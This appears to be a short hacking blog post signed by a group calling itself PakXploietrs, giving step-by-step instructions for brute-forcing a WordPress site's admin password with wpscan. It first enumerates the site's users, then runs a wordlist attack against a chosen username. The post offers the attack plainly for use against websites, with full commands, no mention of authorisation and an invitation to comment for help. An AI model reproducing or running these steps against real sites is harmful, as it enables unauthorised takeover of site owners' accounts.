Wordpress Admin username's Password Brute Force Attack | By Team PakXploietrs.....Xyb3r D3vil

Follow Steps! :)

Open terminal in kali linux and type 

'wpscan --url http://site.com/ --enumerate u

and Press Enter now Wait few Minutes you will get the users of website now you need the wordlist 'I'M Giving U Wordlist so U Can Use It', Get WordList
Save on the desktop Of Kali...(save it as 'wordlist'). 
Now type 

'wpscan --urlhttp://site.com/ --wordlist '/path/wordlist.txt --username USERNAME HERE

(For this step you can also drop and drag the wordlist on terminal) and hit enter then wait few minutes for BRUTE FORCE to check the Passwords, You will get the password of admin user. 'IF YOUR'r LUCKEY'
Commands:- 

root@kali:~# wpscan --url http://site.com/ --enumerate u
root@kali:~# wpscan --url http://site.com/ --wordlist '/path of wordlist/wordlist.txt' --username USERNAME

Note:- This will Not work If the admin user's password is Not In your Wordlist. And sometimes terminal will ask you for 'redirection' simply type 'Y' and hit enter.
Comment me if you face any problem while brute forcing the password!!





#S0ft Hcks!
#MR:47{XYBER SHEIKH}

No comments: